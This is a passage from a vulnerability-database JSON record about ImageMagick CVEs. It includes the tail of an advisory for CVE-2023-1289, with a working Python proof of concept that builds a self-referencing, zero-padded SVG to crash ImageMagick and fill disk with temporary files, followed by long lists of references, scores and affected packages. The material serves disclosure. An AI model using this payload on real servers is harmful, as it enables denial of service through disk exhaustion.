magick-InCjmKQ7uSGizlJFOZz9Vo3Ax1yvLy5L magick-TGIY7l3-dNVdAbGaMIbN0z3YGy5mrNvM\nmagick-3WQIQghdu9-YHVasNASfkkU63yyVdmfO magick-IPu9YWX3Lk96EkP63KLqQ-CX6020cZMN magick-Thg6M-CqdcXc0SyjRdYm19rtVBLt2U6P\nmagick-4hLf4JPIes67QpGP7GfmOPftGvENC1aN magick-IVKuPYBpBe6Lx9F3lLMAMCjIptMoz0ZM magick-TiTtPZdT3Zgsd-pasyRFTb-DbLGNqJTO\nmagick-4tTMAJrCHh2E8M1xw5BIjx8UDyb42FWM magick-IVzovwQiOR2fwJDO5E5RZb58apCPBX8M magick-_TQZIwyyLufZWMVx1-k3YLSYSsGl6upM\nmagick-4xs5mqt95PYGrXXxZiwyYHFKREC0NEWL magick-J36psEABfkKfgVQdeFsptbkRWT0b1uNP magick-tzMg0NWi-_GQOzES2aPMPRqCk-bgjyVN\nmagick-5DmloHI-m-WPROyfQmm5cF8GOEVa5EqO magick-jEq-Q6t6D3CU-eevjhgfjU_LPP3pOEoO magick-ULNarZD53mUqpJrHZVeZw5x0cuUH683N\nmagick-5JvQUY2vVq_kpzhfUTcsxao_YB2WImZN magick-jNiokVz_0Iifz5QX3a9AUIUOBoxfJ49P magick-uLR13qPG6X-c3avLRypLJ-C7-UiUH9tM\nmagick-5NoXNg55Xyh8816ksKEcqreuN1BF93LO magick-jwa4IVvrxrE4OTSA0m8iB2W3K5LiinmQ magick-uW9khwJZfM4EH1cETVDv09QnueONQGPP\nmagick-60BRKi88--TOk-Sp8t5nAyAxjSuOpxfO magick-K5mhLUCkx0WJxcWr7G7oT0nNrc5qBvgQ magick-v4l3nLHBXBjCNc-nTHSTwUOEfsNCUMnP\nmagick-6t2qB_JnplYLZZo5thj6PV0R15LrPe4L magick-K5qzx3k8-36H5wfEgl3Jy1oNpOyscHhN magick-v7Xm_e5JIf4lCC_CwXJkIuQNHEE7D1LM\nmagick-6_UmuyWO8OviaajA92_VeD1bK8z0btAO magick-K6-l4o2PkC4V7Nq_IJ9y-ifJLl6lSzdM magick-vd7xpM8OrXvu3Oftqd7xdRmGDdoGcHrP\nmagick-725dkkTfpkfKmogI4WLWWwCbrxc0aysP magick-KchLIwf4-ahsUq1FsJfK58j3Jb6CAMTP magick-VhfNmWGF-AOhytm1DMGG8n1DLOAG3p1N\nmagick-7rZG_PFyH2Q7ibxFrB4kTQZjkihhU9uO magick-kpcUuOTI4UlrK8kHoZh38ziLMmBjtjvO magick-vHp_Pz6BixbqmYCq_D2zs2sU4hFRbQoP\nmagick--7T1tmKSEJSSPJIgeDEQ9PLdo8oPh60P magick-kReWGvubeCrLdw4RcRsJdJhlV43wCffM magick-VLoWnTJppgO7-ivh0q_uuGcgPDkuyKPN\nmagick-8jBguKQr6qeZTsw4eFbQWO34ndlsBpbO magick-LBjQNSTFFpLRnj3Cldvjm5e_PWYL1fLL magick-Vp_vOIJK-XsFRZeAS1ZJ9Ra2vkgJbCOL\nmagick-9Hno6LBapbL0jw_CSEC7Ua6A7kB3uYiN magick-Lfu-5C1697AwNxTZnljfR24E2_7ZDnwP magick-VpzT9KMjKbomi6mV3ZnnRkoq1WAP41vM\nmagick-9SN2401usIEYCc6zcn442pdvqyVdPWaQ magick-lHxUfKDHYSfpVi7yOc31u7gJVTXLhSuN magick-vRG2_rcf6I8lB2MJF6DqHqh2_z21IP5N\nmagick-a1uVHLsbEnA8yXKvwmW3PWAFBdnfoSnQ magick-M4mcsykxHPNkFTDgc4tdJ9kP1Trkm64M magick-vw2VNrClFVhnXLqVoIz35Xpo232qsngN\nmagick-AbpJUZcspor3bkYr70l17bGSjntyAhZP magick-m5P0dZWaFUeZo4kr8HcO6vpfuICmmBcM magick-WEYdL0amRHxeCpuGiFEuulRwwzkjZyXO\nmagick-Acsy_QEmT-x7nE6DvfIv2pqjLbfJYTtN magick-MHI0zAFGR1-ljbFLl12i5hFVpkoBbdpN magick-WKjEe_jTF4V6Jt_kCbFEy2B6kQcyFseQ\nmagick-Ai76_QfTBT0DXjGqvZ_aAGia_gvAxuGM magick-mOckd_uEYCLc9gy1XwVgtJWpr1aDU7QP magick-WkkwqgsnNNSleWlRm-1BN8RiE-QcF9lO\nmagick-albf_l7tU2ASh6PRhnMWBDscz31fS1BO magick-MrajCpsti_3MlAWlNviDCY3iUeZsgGLM magick-WMlxV7rdjtMYe1F0aggQZW2WNpvhY2GO\nmagick-A-nsLcvOOBlHzdBGQMSsdTrvsfUevEQO magick-mZyca0hC8atGLvY-m0UYec1yCU3rGIWM magick-wnqAodNT7ZVbe8dIN-Gd2pxCNo6cwzOL\nmagick-AplCAOC7_K6cDM3qO3wqSONMhVuztohO magick-NAH0CgD3XCLMS1VN_-4yju-2RCdFJbGO magick-wP3Q3aM05wB2K6NBolzm6sC_R3b5wE1P\nmagick-ApNw8tmuaXUw-mqdMF7P0ZKOV3YHwQGM magick-NU3oGX5NxUhJvWQ_WWY8-7BNAnHWJceM magick-wsCa-R-K6HYtZ7FWWnPg3FpOyGmS1wuO\nmagick-AWye85xaEc_t6rGB9bIvIz9BBhrRyg3O magick-NZBKgJGx7bH8uZ2PiKF8jtzCI9aBDVZN magick-WvNjMMQ2gXHSGNWCMceMqBL8ksnGZIuO\nmagick-aXtmFaHIdz24xjFvCy4ZQda2wef0AH0N magick-o3FerPGSptnb0U5mHu6DH-00ZTlTlDCO magick-xAPfisi5E9NHJKbkrbCGioXCkTs3uDYM\nmagick-B5uiXH3Mrf0GgmF9NAPwqSJd-lMFLfrM magick-o4Dl5iYn3veI54-lNtHgm6wnAIQ79urP magick-Xb2irJZuxzYWsCfmYHc8oaKU67ANR27N\nmagick-BEr6_VZecWKFCRVuSXPEIbJu6uuBe0pO magick-o9S5taGlSrED8zUEtv0EkpjoWk61fJBO magick-Xkes-Q_QqXhMthGwFKxLjpRvL96qRd6O\nmagick-bKCtVcSkQqtXdjO8X_AyWeocMsYuZArN magick-OeHngPf0pRuDH9DpIs_OpkoAbDnAvBTL magick-xlhsal9kyY6QMOSb1WmyTx1vGTqE94bO\nmagick-Btw2-hfTAVQLiPRMXakrXs_UhstT2ZGM magick-OhD82cIFbY91zGxpIt52AbjWekddAU2L magick-xmmr39PvOExl0B8w0YO_oq2_yYyWoVLM\nmagick-By2_pnDUxk85bO3M7kkMbAEXHGShyc0O magick-OlcHbZjE_-66xMyWVlhfAucxYJioiQ4L magick-xq9qw9wK-TRFokBTostne36jQXljCa7M\n...\n```\n\n### Impact\nPossible DOS, because when ImageMagick crashes it generates a lot of trash files. This trash file can be large, if SVG file contains many render action.\n\n### Additional impact\nIn DOS attack if remount attacker uploads an SVG file of size t, ImageMagick generates files of size 103*t. This means that if an attacker uploads a 100 M SVG, the server will generate about 10 G.\n\nExample:\n```\n$cat dos_poc.py \nopen(\"bad_dos.svg\", \"w\").write(\"\"\"<?xml version=\"1.0\"?>\n<?xml-stylesheet href=\"https://example.com/style.xsl\" type=\"text/xsl\" ?>\n<!DOCTYPE test>\n<svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\">\n<image height=\"200\" width=\"200\" href=\"bad_dos.svg"\"\"\" + \"0\"*(1024*1021) + \"\"\""\" />\n</svg>\"\"\")\n$rm -rf /tmp/magick-*\n$python3 dos_poc.py\n$du -h bad_dos.svg\n1,0M\tbad_dos.svg\n$../magick convert -font OpenSymbol bad_dos.svg t.jpg \nSegmentation fault\n$cat /tmp/magick-* > dos_k.txt\n$du -h dos_k.txt \n103M\tdos_k.txt\n```\n\nP. S. If ImageMagick will work in Docker container this attack will crash server where docker running. Because the size of the docker container will increase.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-1289.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-1289.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-1289", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27705", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27762", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27805", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27827", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.2782", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27878", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27812", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27921", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.2792", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27879", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27978", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.2802", "published_at": "2026-04-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-1289" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2176858", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2176858" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/c5b23cbf2119540725e6dc81f4deb25798ead6a4", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/c5b23cbf2119540725e6dc81f4deb25798ead6a4" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00007.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00007.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1289", "reference_id": "CVE-2023-1289", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1289" }, { "reference_url": "https://github.com/advisories/GHSA-j96m-mjp6-99xr", "reference_id": "GHSA-j96m-mjp6-99xr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j96m-mjp6-99xr" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-j96m-mjp6-99xr", "reference_id": "GHSA-j96m-mjp6-99xr", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-j96m-mjp6-99xr" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-2/", "reference_id": "USN-6200-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2023-1289", "GHSA-j96m-mjp6-99xr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6vvv-g1fm-4bdn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81993?format=api", "vulnerability_id": "VCID-6y99-sgwe-tygw", "summary": "ImageMagick: outside the range of representable values of type 'long' and integer overflow at MagickCore/pixel.c and MagickCore/cache.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25676.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25676.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-25676", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00176", "scoring_system": "epss", "scoring_elements": "0.38885", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00176", "scoring_system": "epss", "scoring_elements": "0.39214", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00176", "scoring_system": "epss", "scoring_elements": "0.39185", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00176", "scoring_system": "epss", "scoring_elements": "0.39095", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00231", "scoring_system": "epss", "scoring_elements": "0.45889", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00231", "scoring_system": "epss", "scoring_elements": "0.45895", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00231", "scoring_system": "epss", "scoring_elements": "0.45893", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00231", "scoring_system": "epss", "scoring_elements": "0.45915", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00231", "scoring_system": "epss", "scoring_elements": "0.45885", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00231", "scoring_system": "epss", "scoring_elements": "0.45892", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00231", "scoring_system": "epss", "scoring_elements": "0.45816", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00231", "scoring_system": "epss", "scoring_elements": "0.45839", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00231", "scoring_system": "epss", "scoring_elements": "0.45868", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-25676" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25676", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25676" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891934", "reference_id": "1891934", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891934" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-25676" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6y99-sgwe-tygw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/79204?format=api", "vulnerability_id": "VCID-6zuv-uh18-k3c1", "summary": "security update", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13307.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13307.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.001", "scoring_system": "epss", "scoring_elements": "0.27616", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.001", "scoring_system": "epss", "scoring_elements": "0.27668", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28209", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28252", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": 